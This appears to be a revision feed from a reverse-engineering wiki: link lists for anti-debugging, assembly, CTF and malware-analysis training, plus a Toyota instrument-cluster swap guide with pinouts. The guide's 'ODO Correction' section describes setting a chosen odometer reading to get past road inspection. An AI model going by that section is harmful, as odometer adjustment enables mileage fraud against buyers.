::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.

======x86 and amd64======

::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.

=====Bytecode reference=====
======Java Virtual Machine (JVM)======

::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.

::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.

======Dalvik opcodes (Android)======

::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.

::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.

======Common Language Runtime (CLR) .NET======

::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.

::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).

====Reverse Engineering Challenges====

::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.

::[https://crackmy.app/ CrackMy.App] - is as place to share your crackmes, solve challenges, and climb the leaderboard in the ultimate reverse engineering community.

====Security Training Classes====

::[https://ost2.fyi/ OpenSecurityTraining2] - is a free, beta-stage online platform built on Open edX that offers in-depth cybersecurity and reverse-engineering courses like x86 assembly, kernel exploitation, and firmware analysis.

====Security CTF====
Capture the Flag (CTF) in computer security is an exercise in which participants attempt to find text strings, called "flags", which are secretly hidden in purposefully vulnerable programs or websites. 
Learn more about reverse engineering and cybersecurity start playing CTF's.

::[https://jaimelightfoot.com/blog/so-you-want-to-ctf-a-beginners-guide/ CTF Beginners Guide] - is intended to be a guide for beginners who have just started playing CTFs (or for people who have never played, but would like to).

::[https://ctflearn.com/ CTFlearn] - The most beginner-friendly way to get into hacking. Challenges Test your skills by hacking your way through hundreds of challenges.

::[https://ctf101.org/ CTF101] - a site documenting the basics of playing Capture the Flags. This guide was written and maintained by the OSIRIS Lab at New York University.

::[https://picoctf.org/ picoCTF] - is a free computer security education program with original content built on a capture-the-flag framework created by security and privacy experts.

::[https://microcorruption.com/ MicroCorruption] - is a online, embedded debugger that starts from scratch and introduces the very foundations of memory corruption. Great practice for learning the basics of binary exploitation.

::[https://echoctf.red/ echoctf.red] - A platform to develop, run and administer CTF competitions. The online echoCTF.RED platform user interfaces and codebase.

::[https://pwnable.kr/ Wargames Pwnable.kr] - is a non-commercial wargame site which provides various pwn challenges regarding system exploitation, including reverse engineering, web exploitation, and cryptography.

::[https://pwnable.tw/challenge/ Wargames Pwnable.tw] - is a wargame site for hackers to test and expand their binary exploiting skills. HOW-TO. Try to find out the vulnerabilities exists.

::[https://ctfsites.github.io/ More CTF sites] - A curated list of more CTF sites on Github.

====Embedded security Challenge (ESC)====

::[https://github.com/TrustworthyComputing/csaw_esc_2025 csaw_esc_2025] - CSAW 2025 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2024 csaw_esc_2024] - CSAW 2024 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2023 csaw_esc_2023] - CSAW 2023 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2022 csaw_esc_2022] - CSAW 2022 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2021 csaw_esc_2021] - CSAW 2021 Embedded Security Challenge (Github repo).

::[https://github.com/TrustworthyComputing/csaw_esc_2019 csaw_esc_2019] - CSAW 2019 Embedded Security Challenge (Github repo).

====800 MHz AMPS Documentation====
::[https://wiki.recessim.com/w/images/8/86/Cellular_Telephone_Bible_With_SIDs.txt The Cellular Telephone Bible by Mike Larsen (1997)] Unlock codes and programming procedures of early 800 MHz analog AMPS cellular phones. This document also contains the system IDs (SID) of the 800 MHz analog service providers.

Toyota Paseo GT 1.5 odometer Starlet P9 mod

2026-02-11T19:27:23Z

Polymorphic7: add long exposure night time image for better visual representation.

= Modification Overview =
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play "oem-clean" for the '''Toyota P9''' (EP91 4E-FE 1996-1999). 
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster. After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market.

There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''

[[File:Clusters.png|frameless|380×300px|thumb|left]]

__TOC__

== Toyota Starlet P9 Instrument Cluster Pinout ==
Cluster details: P30, with Tachometer by DENSO.
Part numbers: 83800-10060 and 157370-5241.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low battery warning light → diode
|-
| 2 || Connected || Low battery warning light
|-
| 3 || Connected || Parking brake warning light
|-
| 4 || NC || —
|-
| 5 || NC || —
|-
| 6 || Connected || IG− (Tachometer)
|-
| 7 || NC || —
|-
| 8 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 9 || Connected || IG+ (Tachometer)
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || SRS airbag warning light
|-
| 13 || Connected || SRS airbag warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Fog light indicator
|-
| 2 || Connected || High beam indicator
|-
| 3 || Connected || High beam indicator
|-
| 4 || Connected || Left turn signal indicator
|-
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)
|-
| 6 || NC || —
|-
| 7 || NC || —
|-
| 8 || Connected || Lower 4P terminal (next to speedometer)
|-
| 9 || NC || —
|-
| 10 || Connected || Right turn signal indicator
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || ABS warning light
|-
| 3 || Connected || Check engine light
|-
| 4 || NC || —
|-
| 5 || Connected || E terminal – temperature gauge
|-
| 6 || Connected || T terminal – temperature gauge
|-
| 7 || NC || —
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || Connected || F terminal – fuel gauge
|-
| 13 || NC || —
|-
| 14 || Connected || Gauge backlight lamps
|-
| 15 || Connected || Gauge backlight lamps
|-
| 16 || NC || —
|}

== Paseo GT 1.5 Instrument Cluster Pinout ==
Cluster details: L17, with Tachometer by JECO.
Part numbers: 83800-16080 and 82208-001.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || IG+ (Tachometer)
|-
| 2 || Connected || Low battery warning light → diode
|-
| 3 || Connected || Low battery warning light
|-
| 4 || NC || —
|-
| 5 || Connected || Parking brake warning light
|-
| 6 || Connected || Parking brake warning light
|-
| 7 || Connected || Airbag warning light
|-
| 8 || NC || —
|-
| 9 || NC || —
|-
| 10 || Connected || P (Tachometer)
|-
| 11 || Connected || Airbag warning light
|-
| 12 || Connected || Open door warning light
|-
| 13 || Connected || Open door warning light
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || High beam indicator
|-
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)
|-
| 3 || Connected || Left turn signal indicator
|-
| 4 || Connected || FU terminal – fuel gauge
|-
| 5 || Connected || Fog light indicator
|-
| 6 || Connected || Lower 4P terminal (next to speedometer)
|-
| 7 || Connected || Upper E terminal (next to speedometer)
|-
| 8 || Connected || Right turn signal indicator
|-
| 9 || NC || —
|-
| 10 || Connected || Master warning light
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Status !! Function / Notes
|-
| 1 || Connected || Low fuel warning light
|-
| 2 || Connected || TU terminal – temperature gauge
|-
| 3 || Connected || ABS warning light
|-
| 4 || Connected || Check engine light (MIL)
|-
| 5 || Connected || Low oil pressure warning light (oil pressure switch)
|-
| 6 || NC || —
|-
| 7 || Connected || Gauge backlight lamps
|-
| 8 || Connected || TE terminal – temperature gauge
|-
| 9 || Connected || Gauge backlight lamps
|-
| 10 || NC || —
|-
| 11 || NC || —
|-
| 12 || NC || —
|-
| 13 || NC || —
|-
| 14 || NC || —
|-
| 15 || NC || —
|-
| 16 || NC || —
|}

== Instrument Cluster Wiring Modification ==
These are the modifications needed to be made on the GT cluster.
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.

=== Cutting Traces ===

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 10 || CUT
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 1 || CUT
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT (cut close at FU terminal, leave room to solder)
|-
| 5 || CUT
|-
| 6 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 10 || CUT
|}

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Cutting
|-
| 2 || CUT
|-
| 3 || CUT
|-
| 4 || CUT
|-
| 5 || CUT
|-
| 7 || CUT
|-
| 8 || CUT
|-
| 9 || CUT
|}

=== Rewiring Traces ===
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.

Left Connector A (13-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 2''' went to
|-
| 2 || Must now connect to what '''PIN 3''' went to
|-
| 3 || Must now connect to what '''PIN 5''' went to
|-
| 5 || NC / OPEN
|-
| 6 || Must now connect to what '''PIN 10''' went to
|-
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light
|-
| 9 || Must now connect to what '''PIN 1''' went to
|-
| 10 || NC / OPEN
|}

Middle Connector C (10-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)
|-
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)
|-
| 3 || Must now connect to the top of the high beam indicator light, here we disconnected two traces.
|-
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)
|-
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)
|-
| 6 || NC / OPEN
|-
| 7 || NC / OPEN
|-
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown)
|-
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)
|-
| Jumper || Place a jumper from FE terminal (fuel gauge) to cut trace were '''PIN 2''' went to (top lamp ground)
|}
<gallery widths=302 heights=182>
File:Cut_double_trace_high_beam.PNG|Important disconnect two high beam indicator light traces on the top. Just jump the rest of the trace accordingly.
</gallery>

Right Connector B (16-pin)
{| class="wikitable"
! Pin !! Rewire
|-
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)
|-
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)
|-
| 4 || NC / OPEN
|-
| 5 || Must now connect to what '''PIN 8''' went to
|-
| 7 || NC / OPEN
|-
| 8 || NC / OPEN
|-
| 9 || NC / OPEN
|-
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal
|-
| 14 || Must now connect to what '''PIN 7''' went to
|-
| 15 || Must now connect to what '''PIN 9''' went to
|}

<gallery widths=302 heights=182>
File:Cluster mods.jpg|A picture of all the mods that have been applied.
</gallery>

== ODO Correction ==
If you want to correct yours to avoid getting in trouble by road inspection service. You will have to change it back to your old ODO meter milage. 
Please do not abuse this trick.. I have set mine from around 110.000 to 300.000. Just so I don't get in trouble. 
In the image below you can see how I did it.
<gallery widths=302 heights=182>
File:Odo correction.jpg
</gallery>

== Notes on the Modification ==
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.
They must all be left OPEN FLOATING ('''important''').

= Night time backlight =
[[File:Night_cluster_long_exposure.png|frameless|380×300px|thumb|left]]
[[File:Nighttime running.png|frameless|380×300px|thumb|left]]

File:Night cluster long exposure.png

2026-02-11T19:23:37Z

Polymorphic7: long exposure for better example

== Summary ==
long exposure for better example

Literature

2026-02-10T19:11:10Z

Polymorphic7: +CSAW 2025 Embedded Security Challenge

Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|<nowiki>Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.</nowiki>]]

===Books and Magazines===
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)

::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew "bunnie" Huang

::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew "bunnie" Huang

::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).

::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity & reverse engineering.

===Datasheets, boardviews, schematics, manuals===

====Generic (various fields)====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''

::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.

::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website

::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.

::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum & Schematic Search.

::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....

::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.

::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].

::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.

::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.

::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.

::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.

::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics

::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.

::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..

::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.

====Portable computers, smartphones, videocards, printers, TVs====

'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''

::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.

::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.

::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.

::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.

::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.

::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.

::[https://www.alisaler.com/ AliSaler] - Website offering EC & Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.

::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.

::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic & boardviews downloads. Desktop bios dumps, and free repair tips.

::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.

::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).

::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.

::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.

::[https://www.smarttvmanuals.net/ Smart Tv Manuals & Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.

::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.

::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.

::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).

::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops & desktop schematic diagrams and BIOS downloads.

::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..

=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.

::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.

::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.

=====Software for opening Boardview files=====

::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]

====Retro PC Hardware====
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!

::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.

====Vintage Audio Equipment Schematics / Manuals====
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.

----

===SMD Marking Codes Database===

'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.''' 
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.''' 

::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.

::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.

::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..

::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.

::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.

::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.

::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..

===IC Equivlent Database===

'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross-reference search for an equivalent IC.'''

::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.

::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.

===Hardware pinouts (web-based)===

::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.

::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.

----

===Find a image of the PCB without opening the device===
:# Modify the link below replace "example" without quotes with the product name and model you want to find
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.
::<pre>https://www.google.com/search?tbm=isch&q=example+internal+site:fccid.io</pre>

::Note that there will be no results if the device does not have a wireless receiver or transmitter inside. Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.
::[https://fccid.io/search.php FCCID.io search direct link]

====Electronic certification databases====
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.''' 
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission. 
For legal sale of wireless devices in the US.
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used. 
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.

::* FCC.Report. Provides this easily searchable FCC ID database.
:::: [https://fcc.report/FCC-ID/ -> FCC.Report]
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets.
:::: [https://device.report/ -> Device.Report]

----

===Digital Education===
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.

====Reverse Engineering Guides====
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge.

::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.

::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures.

=====Ghidra Documents=====
'''Class material linked from ghidra.re. Use arrow keys on keyboard to move through slides.'''
======Beginner======
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]
======Intermediate======
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]
======Advanced (PDF)======
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]
======Advanced Development======
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]
======Debugger======
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]
======BSim======
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]

=====IDA Material=====

::[[File:Reverse Engineering Malware IDA & Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA & Olly x86 (5 parts) by otw.

::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]

:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]

::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].

=====x64dbg=====

::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction & documentation page.

=====Immunity Debugger=====

::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.

=====Malware Reverse Engineering=====

::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of "Malware Reverse Engineering".

::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.

::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.

=====Anti Debugging Protection Techniques with Examples=====
======x86 (Win32)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.

::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.

::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals.

======x64 (Win64)======

::[https://anti-debug.checkpoint.com/ cp<r> Anti-Debug Tricks] - By Check Point Research: CPR, x86 & x64.

::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 & x64.

::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.

====Machine code or virtual machine bytecode reference====

=====Assembly reference / manuals=====

======x86======

::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).

======x86 Training======
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.

